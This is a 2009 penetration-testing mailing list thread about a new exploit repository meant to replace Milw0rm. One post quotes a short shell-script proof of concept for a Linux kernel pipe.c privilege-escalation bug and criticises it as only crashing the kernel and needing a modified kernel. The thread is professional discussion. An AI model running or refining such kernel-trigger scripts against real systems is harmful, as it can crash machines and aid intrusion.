Penetration Testing mailing list archives

Re: Possible Milw0rm replacement?
From: "J.Hart, Elec.Eng.Tech." <starnetmaster () gmail com>
Date: Thu, 19 Nov 2009 11:24:21 -0800

Nice.
Yes - it is a learning experience - I never expect the code to be
perfect - that wouldn't be any fun

Elle

On 11/17/09, Pedro Drimel <pedrodrimel () gmail com> wrote:
Note that now some of the applications are available to download
directly from their repositories which is awesome.

2009/11/17 Kevin L. Shaw, CISSP, GCIH <kshaw () eeenterprisesinc com>:
Siim:

One thing I've noticed from the group at Offensive Security is that they
never "give" you anything except a means to start down a path.  Their motto
is "Try Harder" and in fact it is made obvious that any exploit you find in
a repository should be examined and adjusted to serve your purpose.  They
know many of the POCs are not going to fly and leave it up to you to figure
it out or break it down better like you did.  I'm just thankful they brought
something to the community since I don't have the capability to create these
on my own and still complete my day job.  I appreciate you pointing all that
out because it's more for me to figure out and learn too.

Regards,
Kev


Siim Pőder wrote:

Hi

Tom Green wrote:


http://exploits.offensive-security.com/


Just that their review process seems to suck?

"Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability":
while : ; do
  { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
  PID=$!
  OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
       { read PID REST ; echo $PID; } )
  OUT="${OUT%% *}"
  DELAY=$((RANDOM * 1000 / 32768))
  usleep $((DELAY * 1000 + RANDOM % 1000 ))
  echo n > /proc/$OUT/fd/1                 # Trigger defect
done

Not only would that just OOPS the kernel and kill the process, it also
needs a MODIFIED kernel (sleep(n) added to) to even trigger that. The
discoverer himself made that note when he posted the shellscript.

So on first glance it leaves a very professional impression of the site ;)

Siim

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review
Board

Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require a
full practical examination in order to become certified.
http://www.iacertification.org
------------------------------------------------------------------------









-- 
RSA Public Key {Sha1}
3048 0241 00A8 CBCA C93A B066 3751 EBA8 46A3 9431 2BB8 924A 8EB3 0C8D
C055 18C2 5EBE A2AD 629B D40E 4EC4 A496 5413 8C3F 81A2 1B71 74D2 2032
F4BB 6A67 B4EB D545 D34A 32ED DF02 0301 0001


